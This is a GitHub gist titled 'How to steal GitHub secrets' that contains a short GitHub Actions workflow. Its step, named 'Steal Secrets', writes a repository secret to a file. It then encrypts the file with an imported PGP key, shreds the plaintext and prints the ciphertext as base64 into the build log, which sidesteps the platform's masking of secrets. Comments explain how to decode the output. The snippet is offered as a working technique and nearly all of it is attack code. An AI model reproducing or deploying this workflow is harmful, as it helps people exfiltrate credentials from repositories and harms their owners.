Created
December 5, 2025 15:58
-
-
Save Himura2la/dbbd109160b14d6ee15ded5c2577b58c to your computer and use it in GitHub Desktop.
How to steal GitHub secrets
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| jobs: | |
| build: | |
| steps: | |
| - name: Steal Secrets | |
| shell: bash | |
| run: | | |
| set -xe | |
| echo '${{ secrets.TO_STEAL }}' > s.txt | |
| echo '-----BEGIN PGP PUBLIC KEY BLOCK----- | |
| <...> | |
| -----END PGP PUBLIC KEY BLOCK----- | |
| ' | gpg --import | |
| gpg --encrypt \ | |
| --trust-model always \ | |
| --recipient 0632C93424F8D821422F551057E6B3332706243B \ | |
| --output s.gpg \ | |
| s.txt | |
| shred -u s.txt | |
| cat s.gpg | base64 | |
| # You can get the s.gpg file from the base64 string like this: | |
| # base64 -d > s.gpg | |
| # [paste the string and press Ctrl+D twice] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment